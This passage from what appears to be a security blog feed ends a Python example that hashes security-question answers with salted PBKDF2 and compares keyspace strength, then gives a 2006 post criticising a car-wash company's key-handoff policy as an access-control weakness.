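        return "Answer must be at least 8 characters."
    return None


def _normalize(answer: str) -> bytes:
    # Case and surrounding whitespace add no security and only cause lockouts.
    return answer.strip().casefold().encode("utf-8")


def enroll_answer(answer: str) -> dict:
    """Store a salted, stretched hash of the answer instead of the answer itself."""
    err = strong_validate(answer)
    if err:
        raise ValueError(err)
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", _normalize(answer), salt, 200_000)
    return {"salt": salt, "digest": digest}


def verify_answer(record: dict, candidate: str) -> bool:
    """Constant-time comparison of the candidate against the stored hash."""
    digest = hashlib.pbkdf2_hmac("sha256", _normalize(candidate),
                                 record["salt"], 200_000)
    return hmac.compare_digest(digest, record["digest"])


if __name__ == "__main__":
    gibberish = "Kj8#2qL9mZ"  # the kind of answer the post recommends entering
    print(weak_validate("mothers_maiden_name", gibberish))
    print(weak_validate("drivers_license_last4", gibberish))
    print(f"4 alphanumerics: {keyspace_bits(36, 4):.1f} bits; "
          f"8-char mixed password: {keyspace_bits(62, 8):.1f} bits")
    rec = enroll_answer(gibberish)
    print(verify_answer(rec, gibberish), verify_answer(rec, "ab12"))
```

Run stand-alone, the weak validator rejects the gibberish answer on both questions, while the keyspace comparison shows why that matters: four case-insensitive alphanumerics give about 20.7 bits, against roughly 47.6 bits for an eight-character mixed-case password, so the reset question is the weakest link by a wide margin. The hardened path accepts the same gibberish, and because only a salted hash is stored, a database leak does not hand out the answers.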

[tags]security, passwords, authentication[/tags]

How To Get a Car for Under $50
https://ogenstad.net/2006/04/12/how-to-get-a-car-for-under-50/
Wed, 12 Apr 2006 19:04:28 +0000

This isn’t related to computer security, but rather to unauthorized access and policy problems. I had been planning on washing my car for quite some time, but time and other factors (read: laziness) had kept me from doing so. It had come to the point where you tried to avoid your clothes touching the car while stepping into it; I wouldn’t have been surprised if some kid had written “Dirty!” on it with his fingers.

I could have driven it through a car wash, but that wouldn’t have been enough to get it clean. Instead I went to a company where they clean the car for you at a reasonable price: 300 Swedish kronor (roughly $39).

Now the problem arises when I’m there to leave my car: they just want my key and say that I pay when I come back. I don’t think there’s anything wrong with the company; others who have used them have been happy, and they’ve been around for a while.

However, I have trouble comprehending how you could have a system that works that way. What’s to stop someone else from walking into the store, paying $39 and driving off with my car?

I wasn’t expecting to get a digitally signed service order, but some kind of paper would have been comforting. They could have asked to see my driver’s license when I dropped off and picked up the car.

My car is safe in my garage now but I hope those guys change their policy.

[tags]security policy, grand theft auto, security awareness[/tags]
